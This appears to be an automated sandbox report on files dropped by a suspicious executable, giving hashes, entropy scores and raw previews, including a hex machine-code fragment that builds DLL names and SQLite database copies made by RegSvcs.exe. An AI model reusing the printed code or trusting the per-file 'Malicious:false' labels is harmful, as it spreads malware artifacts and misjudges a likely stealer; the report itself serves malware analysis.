                  Process:C:\Users\user\Desktop\b3u71vBG0u.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):9878
                  Entropy (8bit):7.595803258551879
                  Encrypted:false
                  SSDEEP:192:65jwEiqiSLLhK6mXmHAMo0XrFZbHuAAAGVp200bAsmIr+C3VfuOfu36/sLGPF9C7:I6qin6OZ70XrFZbsp200csmIr+C31fIf
                  MD5:33B02492281B84AAF805EB88202EBF4F
                  SHA1:84CC0DBE32C6241B6A1B8F9621ED5450E247E578
                  SHA-256:6369E06E6A3E2495442D98898CFA8D51FCB272B4A54F8818E5A5804F0F029C05
                  SHA-512:9E32E8CC0DAFD0905908B8515EFC0BC28863E28C576C6CC9345C1E1E22082338F9AAE5D5EBB506ACB38105EC95411130869FC9D7BAEAE56D74CDBB4AD01ECE3F
                  Malicious:false
                  Reputation:low
                  Preview:EA06..pT.Q&...8.M.z,.D.Lf....y9......o3.N&T...5...j..m1..f.Y..cD.L'.....3.N(s...m9...s.5..8.L/.Y...e..&6[...0.L..I..k7.N&. ..a0.M.....q4.Nf.P.....K..d.%...p.lY@.......c.Xf.0.o..b.L.`...,@. ...3+..d....s4.l&..........|....sa...`.........Y&.K0.....-vs5.M..2...N&.I...@.>..........$.0...fx. ..$l...I...#..$6...... ..... .Z...a.5..&.).....L.j.;$....M.j.;$....X@j.;%....Y@j.;,.....j.e.|f #^...j......l.....l.5....>0..Xf....M.^....$zn.....G..I....C...M.|........}S{....7...| l..P..........0...`>;..c7.6..{......=..7..............6,......b...,S ...i5.M.4.b..i|v)....b.h.,@..%........9....c...|3Y..h......._......@.>K...,v[..q5.M,.@..i7.X......9....2.......,.`....3.,.i8........}.k(.f..@..M&V....7.,.x....&.......0.......Fh...Fb.....3.."a9...`....,vb.....cd.X..P.Fl.Y.$..c. ....I...d..f.!...,vd......8..P.......0.....2...y...D.......c.0.......b.<NA...NM..;4.X.q1..&@Q..B.Y.ah......Yl.i..."..Bvj.........ic..'3Y..'f.....,j.1........C.`....7b.., .p..T.......Y,Vi......@
                  Process:C:\Users\user\Desktop\b3u71vBG0u.exe
                  File Type:ASCII text, with very long lines (28756), with no line terminators
                  Category:dropped
                  Size (bytes):28756
                  Entropy (8bit):3.5951956499437543
                  Encrypted:false
                  SSDEEP:768:miTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbCO+IFh6q84vfF3if6g1:miTZ+2QoioGRk6ZklputwjpjBkCiw2RW
                  MD5:DAACD4A278B38B990E87D30142501A33
                  SHA1:2A023A5DD8A12720D750B840EDF59F1106CF97A8
                  SHA-256:423A70F3606D0D0F96D2F932614A2125DAD3FF3170E2F04FF4BC3CEF82BD57CD
                  SHA-512:6A1CCA832F6F54E88369752868CC5F867A03BB10EBFCE0AAA1C5A0A15A70A7458F3D88CFFF36E71A0C3096A4255ECCF824DD6AEC3709A2E9900F3D1F23D4853F
                  Malicious:false
                  Reputation:low
                  Preview:8D6804F867D7E3ED21599F86932DA5673082A29A59B06B261C54E6F1DF089BBB368C973697738FDC880x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffff
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                  Category:dropped
                  Size (bytes):114688
                  Entropy (8bit):0.9746603542602881
                  Encrypted:false
                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                  Category:dropped
                  Size (bytes):40960
                  Entropy (8bit):0.8553638852307782
                  Encrypted:false
                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                  MD5:28222628A3465C5F0D4B28F70F97F482
                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                  Category:dropped
                  Size (bytes):40960
                  Entropy (8bit):0.8553638852307782
                  Encrypted:false
                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                  MD5:28222628A3465C5F0D4B28F70F97F482
                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                  Malicious:false
                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                  Category:dropped
                  Size (bytes):40960
                  Entropy (8bit):0.8553638852307782
                  Encrypted:false
                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                  MD5:28222628A3465C5F0D4B28F70F97F482
                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                  Malicious:false
                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                  Category:dropped
                  Size (bytes):40960
                  Entropy (8bit):0.8553638852307782
                  Encrypted:false
                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                  MD5:28222628A3465C5F0D4B28F70F97F482
                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                  Malicious:false
                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                  Category:dropped
                  Size (bytes):40960
                  Entropy (8bit):0.8553638852307782
                  Encrypted:false
                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                  MD5:28222628A3465C5F0D4B28F70F97F482
                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                  Malicious:false
                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                  Category:dropped
                  Size (bytes):40960
                  Entropy (8bit):0.8553638852307782
                  Encrypted:false
                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                  MD5:28222628A3465C5F0D4B28F70F97F482
                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                  Malicious:false
                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                  Category:dropped
                  Size (bytes):98304
                  Entropy (8bit):0.08235737944063153
                  Encrypted:false
                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                  Malicious:false
                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                  Category:dropped
                  Size (bytes):98304
                  Entropy (8bit):0.08235737944063153
                  Encrypted:false
                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                  Malicious:false
                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                  Category:dropped
                  Size (bytes):106496
                  Entropy (8bit):1.1358696453229276
                  Encrypted:false
                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                  Malicious:false
                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                  Category:dropped
                  Size (bytes):106496
                  Entropy (8bit):1.1358696453229276
                  Encrypted:false
                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                  Malicious:false
                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                  Category:dropped
                  Size (bytes):106496
                  Entropy (8bit):1.1358696453229276
                  Encrypted:false
                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                  Malicious:false
                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                  Category:dropped
                  Size (bytes):106496
                  Entropy (8bit):1.1358696453229276
                  Encrypted:false
                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                  Malicious:false
                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                  Category:dropped
                  Size (bytes):106496
                  Entropy (8bit):1.1358696453229276
                  Encrypted:false
                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                  Malicious:false
                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                  Category:dropped
                  Size (bytes):106496
                  Entropy (8bit):1.1358696453229276
                  Encrypted:false
                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                  Malicious:false
                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                  Category:dropped
                  Size (bytes):106496
                  Entropy (8bit):1.1358696453229276
                  Encrypted:false
                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                  Malicious:false
                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                  Category:dropped
                  Size (bytes):1026
                  Entropy (8bit):4.694985340190863
                  Encrypted:false
                  SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                  MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                  SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                  SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                  SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                  Malicious:false
                  Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                  Category:dropped
                  Size (bytes):1026
                  Entropy (8bit):4.692693183518806
                  Encrypted:false
                  SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                  MD5:78F042E25B7FAF970F75DFAA81955268
                  SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                  SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                  SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                  Malicious:false
                  Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                  Category:dropped
                  Size (bytes):1026
                  Entropy (8bit):4.699548026888946
                  Encrypted:false
                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                  Malicious:false
